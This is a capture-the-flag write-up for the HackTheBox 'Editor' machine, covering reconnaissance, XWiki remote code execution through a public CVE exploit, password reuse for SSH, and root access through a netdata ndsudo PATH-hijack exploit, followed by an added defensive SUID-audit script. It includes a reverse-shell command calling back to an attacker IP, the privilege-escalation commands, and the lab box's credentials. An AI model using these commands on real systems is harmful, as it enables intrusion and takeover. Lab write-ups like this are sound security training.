[TOC]

## Editor

![image](https://hackmd.io/_uploads/rkTiavRoxx.png)

https://app.hackthebox.com/machines/Editor

### nmap 10.10.11.80 -sC -sN -A

:::spoiler
Starting Nmap 7.94 ( https://nmap.org ) at 2025-09-22 01:29 EDT
Nmap scan report for 10.10.11.80
Host is up (0.23s latency).
Not shown: 997 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   256 3e:ea:45:4b:c5:d1:6d:6f:e2:d4:d1:3b:0a:3d:a9:4f (ECDSA)
|_  256 64:cc:75:de:4a:e6:a5:b4:73:eb:3f:1b:cf:b4:e3:94 (ED25519)
80/tcp   open  http    nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://editor.htb/
|_http-server-header: nginx/1.18.0 (Ubuntu)
8080/tcp open  http    Jetty 10.0.20
| http-methods:
|_  Potentially risky methods: PROPFIND LOCK UNLOCK
|_http-open-proxy: Proxy might be redirecting requests
| http-robots.txt: 50 disallowed entries (15 shown)
| /xwiki/bin/viewattachrev/ /xwiki/bin/viewrev/
| /xwiki/bin/pdf/ /xwiki/bin/edit/ /xwiki/bin/create/
| /xwiki/bin/inline/ /xwiki/bin/preview/ /xwiki/bin/save/
| /xwiki/bin/saveandcontinue/ /xwiki/bin/rollback/ /xwiki/bin/deleteversions/
| /xwiki/bin/cancel/ /xwiki/bin/delete/ /xwiki/bin/deletespace/
|_/xwiki/bin/undelete/
|_http-server-header: Jetty(10.0.20)
| http-webdav-scan:
|   WebDAV type: Unknown
|   Allowed Methods: OPTIONS, GET, HEAD, PROPFIND, LOCK, UNLOCK
|_  Server Type: Jetty(10.0.20)
| http-title: XWiki - Main - Intro
|_Requested resource was http://10.10.11.80:8080/xwiki/bin/view/Main/
| http-cookie-flags:
|   /:
|     JSESSIONID:
|_      httponly flag not set
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 554/tcp)
HOP RTT       ADDRESS
1   262.26 ms 10.10.14.1
2   262.85 ms 10.10.11.80

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 107.20 seconds
:::

### Checking the versions for known vulnerabilities

#### Jetty 10.0.20

https://www.cybersecurity-help.cz/vdb/eclipse/jetty/10.0.20/

![image](https://hackmd.io/_uploads/rkJcADAoeg.png)

1. 2025/8/21
   - Vulnerability ID: CVE-2025-5115
   - Impact: Resource exhaustion
2. 2024/10/14
   - Vulnerability ID: CVE-2024-6763
   - Impact: Server-Side Request Forgery (SSRF)

#### XWiki Debian 15.10.8

- Vulnerability ID: CVE-2025-24893
- Impact: RCE

> XWiki Debian 15.10.8 looks more serious, so start from there
> Groovy is based on Java

### Exploiting an existing CVE

There is an existing exploit for CVE-2025-24893; see the link below

https://github.com/gunzf0x/CVE-2025-24893/blob/main/CVE-2025-24893.py

:::success
python3 cve_2025_24893.py -t http://10.10.11.80:8080/ -c 'busybox nc 10.10.14.44 4445 -e /bin/bash'
:::

![image](https://hackmd.io/_uploads/B1NO7Fy2lx.png)

![image](https://hackmd.io/_uploads/SkVvmFkhex.png)

:::success
pwd
Current path: /usr/lib/xwiki-jetty
:::

Found in /usr/lib/xwiki-jetty/jetty/etc:

:::success
```xml
<Set name="KeyStorePath">
  <Call name="resolvePath" class="org.eclipse.jetty.xml.XmlConfiguration">
    <Arg><Property name="jetty.base"/></Arg>
    <Arg><Property name="jetty.sslContext.keyStorePath" ... default="etc/keystore.p12" /></Arg>
  </Call>
```
:::

keystore.p12 is not in etc, but there is also an xwiki directory

![image](https://hackmd.io/_uploads/Hyw9qtkhex.png)

In hibernate.cfg.xml, the only password that is not "xwiki":

![image](https://hackmd.io/_uploads/Sk7Q6Fy3gl.png)

:::success
theEd1t0rTeam99
:::

Found the configuration.properties file under /var/lib/xwiki/data

:::success
xwiki.authentication.validationKey = \uBF48\u0EE2\u03FE\u4B0F\u3C8E\u35DA\uEEB8\u4013\u1E90\uF9A7\u4040\u28EA\uD217\u288BF\u6AF7\u377E\u295C\uC98D\u17FB5\uD3D4\u967F\uB8DE\u955B\uD54B\uEE55\u890D\uAFFC\u993B\u1C49\u9B87
xwiki.authentication.encryptionKey = \uC327\u7B18\u1FFE\u913D\uEDBD\u6C85\uE778\uD7C6\u91D0\uA56F\uE1CB\u014B\uD03E\u9E5D\uED9D\uB44A\u3A0C\u1C76\uF0D6\u8289\u645F\u6EB8\u00EB\u99DA\u589E\uE3CE\uC24A\u9486\u5EAB\u2E85\uCCEB\uAF4D
:::

Found the user oliver under /home, but permissions are insufficient

![image](https://hackmd.io/_uploads/Bkeyrq1hel.png)

Went to the .ssh directory, but permissions are insufficient

![image](https://hackmd.io/_uploads/SJIEL51nex.png)

### ssh

No idea how to get into oliver, so tried the password found earlier over ssh, and the login succeeded

![image](https://hackmd.io/_uploads/Hymmaokhge.png)

cat user.txt gives the first flag

### Privilege escalation

:::info
find / -type f -perm -4000 -user root 2>/dev/null
:::

<!--
find / : recursively search the whole filesystem starting from the root /.
-type f : only match files, not directories, symlinks or device files.
-perm -4000 : match files whose setuid (SUID) bit is set.
-user root : restrict to files owned by root.
2>/dev/null : discard error messages (e.g. permission denied on some directories).
-->

SUID (Set User ID): when an ordinary user executes the file, the program runs with the identity of the file's owner rather than the caller's

:::success
/opt/netdata/usr/libexec/netdata/plugins.d/cgroup-network
/opt/netdata/usr/libexec/netdata/plugins.d/network-viewer.plugin
/opt/netdata/usr/libexec/netdata/plugins.d/local-listeners
/opt/netdata/usr/libexec/netdata/plugins.d/ndsudo
/opt/netdata/usr/libexec/netdata/plugins.d/ioping
/opt/netdata/usr/libexec/netdata/plugins.d/nfacct.plugin
/opt/netdata/usr/libexec/netdata/plugins.d/ebpf.plugin
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/bin/su
/usr/bin/umount
/usr/bin/chsh
/usr/bin/fusermount3
/usr/bin/sudo
/usr/bin/passwd
/usr/bin/mount
/usr/bin/chfn
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/libexec/polkit-agent-helper-1
:::

Asked ChatGPT whether any of these files have a ready-made CVE

![image](https://hackmd.io/_uploads/ryA3Wn1heg.png)

:::success
- /opt/netdata/usr/libexec/netdata/plugins.d/ndsudo [ CVE-2024-32019 ]
- /usr/bin/sudo [ CVE-2025-32462 & CVE-2025-32463 ]
:::

CVE-2024-32019 has an existing exploit that can be used

https://github.com/AliElKhatteb/CVE-2024-32019-POC/blob/main/README.md

:::info
step1 : download the exploit.c file; remember to change the ip in the file to your own ip
step2 : compile it as nvme
`x86_64-linux-gnu-gcc -o nvme exploit.c -static`
step3 : check
![image](https://hackmd.io/_uploads/Hk5fKhJ3gx.png)
step4 : upload the executable to oliver
`scp nvme oliver@10.10.11.80:/home/oliver`
step5 : check that the executable is really there
![image](https://hackmd.io/_uploads/BJ4dF2yhle.png)
step6 : open a port to receive the connection
`nc -lvnp 4445`
step7 : run the exploit
`PATH=$(pwd):$PATH /opt/netdata/usr/libexec/netdata/plugins.d/ndsudo nvme-list`
:::

Back on the listener, the privilege escalation has succeeded

![image](https://hackmd.io/_uploads/H1s_c3J3ge.png)

The root.txt file is in the root directory; open it to get the flag

![image](https://hackmd.io/_uploads/S1cjc21heg.png)
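As an added example (not part of the original writeup), the `find` command from the privilege-escalation section can be turned into a small audit that reports SUID files sitting outside the usual distro-managed directories, which is how a third-party helper like the netdata `ndsudo` plugin under /opt would stand out in a defensive review. The trusted-prefix list, the scratch-root and owner parameters, and the function names are my assumptions.

```shell
# Added example: audit SUID binaries and flag those outside the standard
# system directories. ROOT and OWNER are parameters (assumption) so the
# functions can be exercised against a scratch tree as well as against /.

# Directories where distro-managed SUID binaries normally live (assumption).
TRUSTED_PREFIXES="/usr/bin /usr/sbin /usr/lib /usr/libexec /bin /sbin"

# find_suid ROOT OWNER -> sorted list of SUID regular files owned by OWNER,
# i.e. the writeup's `find / -type f -perm -4000 -user root 2>/dev/null`
find_suid() {
    find "$1" -type f -perm -4000 -user "$2" 2>/dev/null | sort
}

# is_trusted PATH -> exit 0 if PATH is under one of TRUSTED_PREFIXES
is_trusted() {
    for p in $TRUSTED_PREFIXES; do
        case "$1" in
            "$p"/*) return 0 ;;
        esac
    done
    return 1
}

# audit_suid ROOT OWNER -> prints one "UNEXPECTED SUID: <path>" line per
# SUID file that is not under a trusted prefix (paths shown relative to ROOT)
audit_suid() {
    find_suid "$1" "$2" | while IFS= read -r f; do
        if [ "$1" = "/" ]; then
            rel="$f"
        else
            # strip the scratch root so prefixes compare against real system paths
            rel="${f#"$1"}"
        fi
        is_trusted "$rel" || printf 'UNEXPECTED SUID: %s\n' "$rel"
    done
}
```

Run as `audit_suid / root` on a live host; the netdata plugins listed in the writeup would all be reported, while /usr/bin/sudo and the other stock binaries would not.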